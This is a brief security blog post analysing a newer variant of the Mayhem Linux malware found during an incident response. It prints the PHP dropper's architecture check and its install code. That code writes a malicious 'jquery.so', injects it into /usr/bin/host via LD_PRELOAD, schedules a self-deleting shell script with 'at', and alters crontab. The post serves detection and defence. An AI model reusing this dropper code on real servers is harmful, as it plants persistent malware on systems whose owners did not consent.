Mayhem malware still on the wild

Years ago, colleagues from Yandex introduced the concept of Mayhem infections.

In that post, they provided very detailed information about the malware, its functionalities and capabilities.

The interesting point of the malicious code, is its mechanisms of planting itself in the system. Even if an infected server gets the site restored from a backup and php re-installed, the malware would still be there. That happens because a compiled shared object gets copied into the system and runs as a service.

During an Incident Response investigation, we found that the Mayhem malware family is still in the wild and so we wanted to point out a few changes. This malware targets both x32 & x64 architectures, and chooses the correct shared object version to load depending on the current system’s architecture as you can see below:

$arch = 64;if (intval("9223372036854775807") == 2147483647)$arch = 32;$so = $arch == 32 ? $so32 : $so64;

Here’s the code for copying and starting the malware:

$f = fopen("/usr/bin/host", "rb");if ($f) {$n = unpack("C*", fread($f, 8));$so[7] = sprintf("%c", $n[8]);fclose($f);}$n = file_put_contents("./jquery.so", $so);$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];$HBN=basename("/usr/bin/host");$SCP=getcwd();@file_put_contents("1.sh", "#!/bin/shncd '".$SCP."'nif [ -f './jquery.so' ];then killall -9 $HBN;export AU='".$AU."'nexport LD_PRELOAD=./jquery.son/usr/bin/hostnunset LD_PRELOADncrontab -l|grep -v '1.sh'|grep -v crontab|crontabnfinrm 1.shnexit 0n");

@chmod(“1.sh”, 0777);@system(“at now -f 1.sh”, $ret);

Unlike the original samples, there is no reference to MAYHEM_DEBUG system variable anymore. Also, the shared object name was changed from “libworker.so” to “jquery.so”

To prevent attacks that exploit vulnerabilities in your site software, we suggest using a Web Application Firewall (WAF).